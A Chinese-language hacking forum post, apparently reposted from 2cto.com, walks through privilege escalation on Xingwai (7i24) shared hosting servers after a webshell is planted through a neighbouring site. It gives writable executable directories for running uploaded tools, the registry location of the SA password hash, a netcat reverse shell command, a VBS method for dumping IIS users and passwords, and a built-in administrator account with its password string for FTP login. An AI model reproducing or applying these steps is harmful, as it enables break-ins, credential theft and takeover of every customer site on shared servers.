最近段时间谈了比较多星外提权的方法，最近刚好碰到了站结合些大牛的思路写个过程！目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本！上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限！RegShell读注册表没发现多少利用的东西，收集了一下信息,根据信息知道是星外的.

对新手来说在这里很容易陷入困境！
星外sa密码注册表位置：HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 32位MD5加密很多情况下MD5跑不出有高人找到了个可写可执行目录C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ cmd.exe上传在这里可以执行些简单的命令如: set,systeminfo,ipconfig,ping,等~利用这些命令可以收到比较多的系统信息.
如果你比较幸运管理配置不当的话还可以DIR C.D.E等其他盘，很久以前小K(khjl1)给我发了个for命令利用，for命令比dir执行权限要小 类似dir的功能 大家可以在不能dir的情况下试下
for /r d:\freehost\ %i in (test) do @echo %i >>C:\路径\1.txt  把d:\freehost\所有文件写入1.txt在用VBS读IIS密码时候很多提到NC反弹,其实不需要  很多情况下NC根本反弹不了,防火墙都挡住了.成功率很底。 如果你失败了而非得继续NC的话可以试下这个兄弟的,大家或许可以根据这个方法测试下。反弹cmdshell：
“c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe”
通常都不会成功。
而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。
******我是没成功,呵呵******

systeminfo看了下管理把补丁打得很齐全用VBS提权测试  这里我们可以把iis.vbs上传到WEB跟目录下而不必传到Media Index目录但是提权工具必须传到Media Index才有权限执行切记~  C:\Documents and Settings\下有空格所以得用”"包含 如:
CmdPath：
C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cmd.exe
Argument:
/c “c:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe” d:\freehost\web\1.vbs
不包含的话会提示失败，所以细节决定成败！

iis.vbs列出了所有域名和路径当然也包括我们的目标站,试下用TYPE命令目标数据配置信息(提权下可以读些MSSQL或MYSQL的WEB配置等~~~信息方便提权)我这里只针对目标,这里库是ACCESS的  再结合手上的几个VBS读IIS用户和密码  用读出的密码21端口可以连接 收工！

经常有人问我要免杀LCX,其实如果支持ASPX的话上面有个PortMap功能很多人没注意还是什么的,这个类似LCX做转发,在支持ASPX的站上就别传什么LCX了.免杀还麻烦以上根据别人和自己经验整理，其实也很简单的,方便些新手学习  如有不足请提醒.

补充: www.2cto.com

星外虚拟机一直被认为很BT，其实我感  觉还是很好搞，至少他支持aspx。找到有的执行目录一般99% 可以秒杀他 ，拿下服务器权限。
星外可执行的目录最新版本C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ 这个目录，还有就是C:\PHP\PEAR 这个目录。C:\PHP\PEAR在10，11月份的时候我还发现很多虚拟机可写可执行的，现在发现的不是很多了。C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ 这个目录论坛提到过很多次了，昨晚杀虫剂的文章也写的很明白了。

星外的最大的BUG就是 FTP是系统自带的，里面可以 通过列IIS配置信息 列出来。(上传个cscript.exe和 修改过的adsutil.vbs)

7i24虚拟主机管理平台受控端freehostrunat  fa41328538d7be36e83ae91a78a1b16f!7
Freehostrunat这个用户是安装星外时候建立的，属于administrators用户组里的。到这里估计还是有人不明白 这个用户fa41328538d7be36e83ae91a78a1b16f!7 是什么加密方式。我先前也这样犯傻过，还跑去翻星外有关的注册表，配置文件等等，到最后还是没解密出来。后来想了想，他的验证过程不可能加密的，因为windows自带的FTP又不会识别他的这密文，其他网站都是明文，所以直接登陆就行